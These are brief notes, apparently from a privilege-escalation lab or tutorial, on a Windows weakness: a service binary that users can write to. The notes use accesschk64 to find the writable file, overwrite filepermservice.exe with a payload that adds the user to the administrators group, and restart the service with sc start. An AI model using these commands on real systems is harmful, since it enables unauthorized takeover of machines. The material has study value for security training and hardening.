Executable Files
like the pervious example but we target.exe programs which run in background
Detection
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
we have a permission to edit on file call filepermservice.exe so we can replace it by our shell to add himself in admin group
Exploitation
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc